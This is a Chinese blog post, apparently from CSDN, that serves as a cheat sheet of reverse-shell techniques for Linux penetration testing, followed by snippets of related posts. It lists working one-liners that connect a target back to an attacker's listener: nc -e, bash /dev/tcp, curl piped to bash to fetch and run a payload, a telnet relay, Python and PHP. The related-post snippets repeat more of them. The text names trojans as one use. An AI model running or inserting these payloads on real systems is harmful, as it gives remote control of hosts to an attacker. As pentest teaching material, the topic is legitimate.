常用反弹 shell 方式总结

已于 2023-06-14 11:01:43 修改
阅读量4.7k 收藏 35
点赞数 3
文章标签: 网络 服务器 运维
于 2023-03-07 16:12:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43531669/article/details/113533539
版权

在对 Linux 系统进行渗透测试中,常常会用到反弹 shell 的操作,今天来总结一下常用反弹 shell 的方式。

什么是反弹shell:

反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。

正向连接:

假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。

什么情况下需要用到反弹shell:

大致有如下几种情况:

  1. 由于防火墙等限制,对方机器只能发送请求,不能接收请求。
  2. 拿到了目标机器的远程执行命令权限,为操作方便想要在本机拿到 shell 。
  3. 目标机位于局域网,直接连接不了。
  4. 目标机器的ip动态改变,你不能持续控制。
  5. 对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机等情况都是未知的,所以建立一个服务端让恶意程序主动连接,才是上策。

对于以上几种情况,我们是无法利用正向连接的,要用反向连接。

反弹 shell 的方式有很多,那具体要用哪种方式还需要根据目标主机的环境来确定,比如目标主机上如果安装有 netcat,那我们就可以利用 netcat 反弹 shell,如果有python环境,可以利用 python 反弹。如果具有 php 环境也同理。

1、利用netcat反弹shell

netcat(简称 nc)被称为网络工具中的瑞士军刀,体积小巧,但功能强大,可以通过TCP或UDP协议进行网络连接和数据传输,是一种非常强大而又灵活的网络工具。目前,默认的各个Linux发行版本已经自带了 netcat 工具包,windows 也可以下载使用:下载链接

Linux 下出于安全考虑,原生版本的 netcat 可以直接发布与反弹本地 shell 的功能参数 -e 都被阉割了,想要通过 netcat 反弹 shell 需要手动下载二进制安装包。

NC常用参数介绍:

-l:侦听模式,即使没有接收到数据包,也会一直保持连接状态。

-p:指定本地端口号。如果未指定,则nc将随机选择一个空闲的端口。

-v:提供更详细的输出信息,例如打印出nc建立的连接和传输的数据。使用vv获取更详细的信息。

-e:指定要在连接建立后执行的命令。

-n:不执行DNS解析,使用IP地址连接。

-u:使用UDP协议而不是默认的TCP协议。

-w:设置超时时间。如果在指定的时间内没有连接或数据传输,则nc将退出。

-z:仅扫描目标主机的端口,不进行数据传输。

攻击机开启本地监听:

nc -lvvp port

目标机主动连接攻击机:

nc ip port -e /bin/bash
# nc <攻击机IP> <攻击机监听的端口> -e /bin/bash
2、Bash反弹(常用):

这种方式更加通用。

目标主机上执行:

bash -i >& /dev/tcp/x.x.x.x/port 0>&1

解析:

  • bash -i 打开一个交互的bash
  • >& 将标准错误输出重定向到标准输出
  • /dev/tcp/x.x.x.x/port 意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口
  • 0>&1 标准输入重定向到标准输出,实现你与反弹出来的shell的交互

注:/dev/tcp/ 是Linux中的一个特殊设备文件(Linux一切皆文件),实际这个文件是不存在的,它只是 bash 实现的用来实现网络请求的一个接口。打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。

攻击者主机上执行监听:

nc -lvvp port

在这里插入图片描述

nc监听端口时有时会碰到报错:nc: getnameinfo: Temporary failure in name resolution,这是因为域名解析失败造成的,可以加个参数 n 解决。
在这里插入图片描述

3、Curl配合Bash反弹shell:

在目标机上执行 curl 攻击者web服务ip|bash,该 ip 的web服务目录里的 index 文件上含有 bash 一句话,就可以反弹shell。

首先,在攻击者自己的服务器 web 目录里面创建一个index文件(index.php或index.html),内容如下:

bash -i >& /dev/tcp/攻击者主机ip/port 0>&1

开启2333端口的监听。

然后再目标机上执行如下,即可反弹shell:

curl 攻击者web服务ip|bash

这里为了方便把 index 文件放在攻击机上了,实际是要放在公网web服务器上的。
在这里插入图片描述

4、telnet反弹:

攻击者主机上打开两个终端分别执行监听:

nc -lvvp 3333

nc -lvvp 4444

目标主机中执行:

telnet x.x.x.x 3333 | /bin/bash | telnet x.x.x.x 4444

监听两个端口分别用来输入和输出,其中x.x.x.x均为攻击者ip

反弹shell成功后,在监听3333端口的终端中执行命令可以在另一个终端中看到命令执行结果。
在这里插入图片描述

5、常见脚本反弹
Python

当目标主机上有python环境时,我们可以用Python来反弹shell。Python在现在一般发行版Linux系统中都会自带,所以使用起来也较为方便。

攻击机开启本地监听:

nc -lvvp 2333

目标机主动连接攻击机:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.50.1",2333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

在这里插入图片描述
在这里插入图片描述
当返回失败时可以尝试把 /bin/bash 改成 /bin/sh

php

当目标主机上有php环境时,我们可以用php来反弹shell。

攻击机开启本地监听:

nc -lvvp 2333

目标机主动连接攻击机:

php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i <&3 >&3 2>&3");'
未完成的歌~
关注
  • 3
    点赞
  • 35
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python模拟菜刀反弹shell绕过限制【推荐】
09-19
主要介绍了利用python模拟菜刀反弹shell绕过限制,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
php反弹shell实现代码
10-30
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
Python实现反向Shell
最新发布
xingxsc的博客
02-08 408
反向Shell的实现也是可以通过python来实现,接下来会用到socket, subprocess来写。
反弹shell小工具源码
10-12
依赖PHP环境。修改IP、端口,自动生成命令
反弹 shell 常见方式详解(非常实用)
10-18
反弹 shell 常见方式详解(非常实用) [ 隧道技术 ] 反弹shell(一)nc反弹shell [ 隧道技术 ] 反弹shell(二)bash反弹shell [ 隧道技术 ] 反弹shell(三)powercat反弹shell [ 隧道技术 ] 反弹shell(四)python反弹shell
常用shell命令总结
07-17
常用shell命令总结
Linux下NC反弹shell命令(推荐)
09-15
主要介绍了Linux下NC反弹shell命令,非常不错,具有参考借鉴价值,需要的的朋友参考下吧
常见反弹shell总结
weixin_45116657的博客
10-21 488
1、nc 发送:nc -e /bin/sh 10.0.0.1 1234 接收:nc -nlvp 1234 2、bash: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 3、perl: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getp...
反弹shell
热门推荐
weixin_39430198的博客
03-09 1万+
一、课时目标 1.理解shell的概念 2.理解交互式shell和非交互式shell的区别 3.掌握反弹shell的原理和方法
linux 渗透 密码,linux渗透中常用命令+Tip
weixin_42128141的博客
05-03 179
1.bashattacker 监听nc -lvvp 4444victim 运行bash -i >& /dev/tcp//4444 0>&12. pythonattacker 监听nc -lvvp 4444victim 运行python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,sock...
常用shell脚本总结
07-09
常用shell脚本总结
python反弹shell
weixin_42576467的博客
01-07 642
你是想问 Python 如何实现反弹 shell 吗? 反弹 shell 是一种通过远程连接获取受害者计算机的 shell 权限的攻击技术。 使用 Python 反弹 shell 的方法如下: 首先,在本地计算机上运行一个监听程序,等待连接。 然后,在受害者计算机上运行一个 Python 脚本,该脚本将连接到本地计算机的监听程序。 当连接建立后,就可以通过本地计算机上的 shell 命令控制...
各种shell反弹方法
weixin_46626737的博客
05-16 1477
s.connect(("攻击ip",port));再在目标机器执行bash -i > &/dev/tcp/攻击ip/端口 0>&1。post方式,ip=?2.使用nc进行反弹shell。6.使用php反弹shell
如何用内网虚拟机kali实现反弹shell
qq_44657899的博客
05-23 8762
文章目录实验环境设置端口转发反弹shell验证为什么要反弹shell? 这里我讲述的是NAT模式下的反弹shell,因为个人感觉NAT模式方便一点。 实验环境 攻击机:kali虚拟机(位于内网) ip:192.168.77.128 宿主机:win10(位于外网) ip:10.8.163.224 受害端:centos-7 设置端口转发 虚拟机集群此时相当于在内网中,而要实现反弹shell,我们的受害端centos7必须要能够连接我们的虚拟机kali。可以通过端口转发的功能来实现,比如我
python教程:正常shell反弹shell
m0_72282564的博客
11-25 763
1.把服务端打包成exe文件,然后在win7运行打包好的exe文件,python打包成exe文件这里推荐pyinstaller模块(需要安装,安装方法不会的百度)打包成exe文件时最好打包成文件夹,如何打包成单个exe文件,在win7中运行可能会出题。#只要服务端一直运行,如果把客户端的程序加入到开机自启,这样客户端已开启就被连接到服务端。反弹shell的好处就是:一旦被攻击端开机,立即连接上攻击端(需要攻击端一直运行)反弹shell,攻击端是服务端,被攻击端是客户端。
linux 反弹shell
weixin_30426957的博客
06-30 119
Linux下反弹shell笔记 0x00 NC命令详解 在介绍如何反弹shell之前,先了解相关知识要点。 nc全称为netcat,所做的就是在两台电脑之间建立链接,并返回两个数据流 可运行在TCP或者UDP模式,添加参数 —u 则调整为udP,默认为tcp -v 参数,详细输出 n参数高数netcat不要DNS反向查询IP的域名 z参数,连接成功后立即关闭连接 ...
浅谈反弹shell
weixin_53284312的博客
01-12 2183
反弹shell
Linux反弹shell
谢公子的博客
11-29 9243
目录 Bash反弹shell Python反弹shell 其他命令反弹shell 写入命令到定时任务文件 写入SSH公钥 写入/etc/profile文件 当我们可以在远程Linux主机上执行任意命令或写入任意数据到任意文件的时候,我们通常会通过以下方式控制远程主机。 Bash反弹shell Linux 反弹 shell 使用下面这条命令,该命令弹回来的shell是不可交互的,...
反弹shell方式
08-11
反弹shell方式有多种,具体的方式取决于目标系统的类型和渗透测试工具的选择。在Linux系统下,一种常见的反弹shell方式是通过Bash反弹。这种方式可以使用一些命令行工具(如nc或socat)来建立与攻击者之间的连接。另外,Cobalt Strike工具的Scripted Web Delivery模块也可以通过bitsadmin、powershellpython、regsvR32等方式来实现反弹shell的功能。在Windows系统下,一种常见的反弹shell方式是通过3389端口来远程连接目标主机。当然,具体的反弹shell方式还有其他许多选择,取决于具体的渗透测试场景和工具的选择。123 #### 引用[.reference_title] - *1* *3* [反弹shell的方法总结(base64绕过等等)](https://blog.csdn.net/weixin_50464560/article/details/123898780)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* [反弹shell的N种姿势](https://blog.csdn.net/xiaofengdada/article/details/126832722)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值